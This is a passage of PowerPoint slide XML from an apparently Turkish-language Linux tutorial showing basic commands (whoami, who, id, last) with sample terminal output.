              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Mevcut dizinin adını ekrana yazar.</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/home/user/</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="Google Shape;142;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1959425"/>
            <a:ext cx="4115400" cy="10764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91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>$ whoami</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t># Oturum açmış kullanıcıyı ekrana yazar.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="3151625"/>
            <a:ext cx="4115400" cy="15894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50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> $ who</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> # Oturum açan tüm kullanıcıları verir</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>tty1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>         </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2022-11-15 08:30 (:0)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="DF3079"/>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1000">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pts/0 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2022-11-15 09:15 (192.168.1.2)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="DF3079"/>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1000">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>pts/1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFF2CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2022-11-15 10:00 (192.168.1.3)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:srgbClr val="DF3079"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Google Shape;144;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399600" y="3151625"/>
            <a:ext cx="4596600" cy="15894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50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> $ id john</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#kullanıcınin bilgilerini gösteren bir Linux komutudur.</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>uid=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(john) gid=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(john) groups=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>1000</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(john),</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(adm),</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>24</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(cdrom),</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>27</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(sudo),</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(dip),</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>46</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(plugdev),</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>113</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(lpadmin),</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(sambashare)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4399600" y="679925"/>
            <a:ext cx="4596600" cy="12075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 last</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>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800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>     pts/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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192.168.1.100</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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30</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>   still logged </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>     pts/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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192.168.1.100</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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25</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -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30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00</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05</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="2E95D3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>     pts/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="DF3079"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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192.168.1.100</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>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22</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> -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25</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00</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03</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
